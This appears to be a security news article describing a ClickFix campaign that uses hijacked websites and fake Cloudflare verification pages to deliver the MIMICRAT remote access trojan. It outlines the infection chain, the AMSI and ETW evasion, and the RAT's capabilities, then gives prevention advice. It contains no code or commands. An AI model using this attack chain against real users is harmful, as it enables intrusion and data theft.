Cybersecurity researchers uncovered a clever new ClickFix attack. Attackers hijack legitimate websites to deliver MIMICRAT malware. This previously unknown RAT gives full remote control to criminals.
How the Campaign Starts
The attack begins on compromised legitimate sites. One example is a BIN validation service that attackers breached. They inject malicious JavaScript code. This code loads an external PHP script quietly.
The PHP script shows a fake Cloudflare verification page. It tells victims to copy a command and paste it into the Windows Run box. Many users follow the instructions. Therefore, the infection chain starts without suspicion.
The pasted command runs a PowerShell script. This script fetches a second-stage script from a C2 server. The second script bypasses ETW logging and AMSI scanning. It then drops a Lua-based shellcode loader. The Lua script decrypts and runs shellcode in memory. No files touch the disk in clear form. This makes detection very hard. Finally, the shellcode installs MIMICRAT on the victim machine.
MIMICRAT RAT Capabilities
MIMICRAT is a custom C++ remote access trojan. It supports Windows token impersonation. It creates SOCKS5 tunnels for stealthy traffic. The RAT handles 22 different post-exploitation commands.
Attackers control processes and the file system. They run interactive shells and inject shellcode. They manipulate tokens and tunnel traffic. This allows deep access for ransomware or data theft.
Sophisticated Evasion and Reach
The campaign uses HTTPS on port 443. Traffic mimics legitimate web analytics patterns. For example, it blends with normal browsing behavior. This helps avoid network alerts. The lure supports 17 languages. It auto-localizes based on browser settings. Victims appear in many countries. Reports show hits on a U.S. university and Chinese-speaking users.
This campaign shares tactics with another ClickFix operation. That one delivered Matanbuchus loader. Both end with MIMICRAT deployment. The goal likely includes ransomware or data exfiltration.
Attackers choose compromised sites carefully. They span different industries and regions. Therefore, the delivery infrastructure stays resilient. Takedowns become much harder.
Prevention Strategies
Organizations and users can block these attacks with strong habits. First, never copy and run commands from websites or pop-ups. Verify suspicious pages directly with the real site. Moreover, use continuous monitoring to detect unusual PowerShell execution, ETW tampering, or connections to unknown HTTPS servers early.
Enable strict script blocking and AMSI protection. Train staff to recognize fake verification prompts. These steps greatly reduce the success of ClickFix campaigns and RAT infections like MIMICRAT.
Sleep well, we got you covered.
